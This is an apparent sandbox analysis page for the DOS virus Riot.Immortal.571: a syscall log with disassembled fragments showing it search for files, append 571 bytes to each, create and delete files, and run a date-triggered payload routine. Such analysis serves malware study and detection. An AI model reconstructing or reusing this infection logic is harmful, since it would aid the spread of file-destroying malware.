Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.571

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:05:23.845297399Z 26 PC: 12a65 | Set disk transfer address
2018-12-17T22:05:23.8470234Z 53 PC: 12a6b | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:05:23.8482082Z 53 PC: 12a78 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:05:23.849312268Z 44 PC: 12a83 | Get time 0x12a83: cmp dl, 0xd
0x12a86: jg 0x12a8c
0x12a88: mov al, 0x82
0x12a8a: out 0x21, al
0x12a8c: lea dx, word ptr [bp + 0x2e5]
0x12a90: call 0x12ba0
0x12a93: lea dx, word ptr [bp + 0x2f5]
0x12a97: call 0x12ba0
0x12a9a: mov ah, 0x3c
0x12a9c: mov cx, 0
0x12a9f: lea dx, word ptr [bp + 0x307]
0x12aa3: int 0x21
0x12aa5: lea dx, word ptr [bp + 0x315]
0x12aa9: mov si, 0x1f
0x12aac: nop
0x12aad: call 0x12bf1
0x12ab0: mov bx, ax
0x12ab2: mov ax, 0x4000
0x12ab5: mov cx, 0x1f
0x12ab8: nop
2018-12-17T22:05:23.851530457Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:23.862251079Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:23.867530128Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:23.868829965Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.202402416Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.203779336Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.206573157Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.213737432Z 61 PC: 12ba5 | Open file (Filename = '')
2018-12-17T22:05:24.223054346Z 60 PC: 12aa5 | Create or truncate file
2018-12-17T22:05:24.233072258Z 64 PC: 12abf | Write file or device (Write 31 bytes on handle 5)
2018-12-17T22:05:24.241313917Z 62 PC: 12acf | Close file
2018-12-17T22:05:24.261764347Z 44 PC: 12ad3 | Get time 0x12ad3: cmp dl, 0x32
0x12ad6: jg 0x12b12
0x12ad8: mov si, 0x12
0x12adb: lea dx, word ptr [bp + 0x1b3]
0x12adf: call 0x12bf1
0x12ae2: mov ah, 9
0x12ae4: int 0x21
0x12ae6: mov si, 0x12
0x12ae9: call 0x12bf1
0x12aec: mov ah, 0
0x12aee: int 0x16
0x12af0: jmp 0x12b12
0x12af2: nop
0x12af3: dec cx
0x12af4: and byte ptr [bx + di + 0x6d], ah
0x12af7: and byte ptr [bx + di + 0x20], ah
0x12afa: inc dx
0x12afb: bound si, dword ptr fs:[di + 0x67]
0x12b00: and byte ptr [bx + di + 0x6e], ah
0x12b03: and byte ptr fs:[bx + di + 0x4c], al
2018-12-17T22:05:24.264121178Z 67 PC: 12c09 | Get or set file attributes
2018-12-17T22:05:24.270435545Z 65 PC: 12c0d | Delete file (Filename = '')
2018-12-17T22:05:24.276095002Z 78 PC: 12b2e | Find first file
2018-12-17T22:05:24.281788335Z 61 PC: 12ba5 | Open file (Filename = '�')
2018-12-17T22:05:24.28854579Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.307128731Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.308459187Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.321984782Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.324138545Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.330547782Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.343519328Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.356115861Z 61 PC: 12ba5 | Open file (Filename = '�')
2018-12-17T22:05:24.363010257Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.37001741Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.372804281Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.381053675Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.386561928Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.394342073Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.403060676Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.406140762Z 61 PC: 12ba5 | Open file (Filename = '�')
2018-12-17T22:05:24.414427077Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.421045676Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.42279905Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.432105482Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.433830918Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.440526859Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.450551911Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.45395484Z 61 PC: 12ba5 | Open file (Filename = '�')
2018-12-17T22:05:24.460656689Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.468452263Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.470494107Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.479041928Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.480715289Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.487735734Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.496317336Z 79 PC: 12b2e | Find next file
2018-12-17T22:05:24.498898089Z 61 PC: 12ba5 | Open file (Filename = '�')
2018-12-17T22:05:24.505963059Z 63 PC: 12bb3 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:05:24.512473613Z 66 PC: 12bc2 | Move file pointer
2018-12-17T22:05:24.513810984Z 64 PC: 12bd4 | Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:05:24.522427018Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:05:24.524286584Z 64 PC: 12be7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:05:24.530957852Z 62 PC: 12bf0 | Close file
2018-12-17T22:05:24.540686657Z 42 PC: 12b59 | Get date 0x12b59: cmp dh, 0x11
0x12b5c: jl 0x12b85
0x12b5e: cmp dl, 8
0x12b61: jl 0x12b85
0x12b63: lea dx, word ptr [bp + 0x1b3]
0x12b67: mov si, 0x12
0x12b6a: call 0x12bf1
0x12b6d: mov bx, dx
0x12b6f: mov ah, 0x19
0x12b71: int 0x21
0x12b73: mov cx, 0x25
0x12b76: mov dx, 0
0x12b79: push ds
0x12b7a: pop es
0x12b7b: mov byte ptr [bp + 0x241], 0x26
0x12b80: int 0x19
0x12b82: add sp, 2
0x12b85: mov ah, 0x1a
0x12b87: mov dx, 0x80
0x12b8a: int 0x21
2018-12-17T22:05:24.542882339Z 26 PC: 12b8c | Set disk transfer address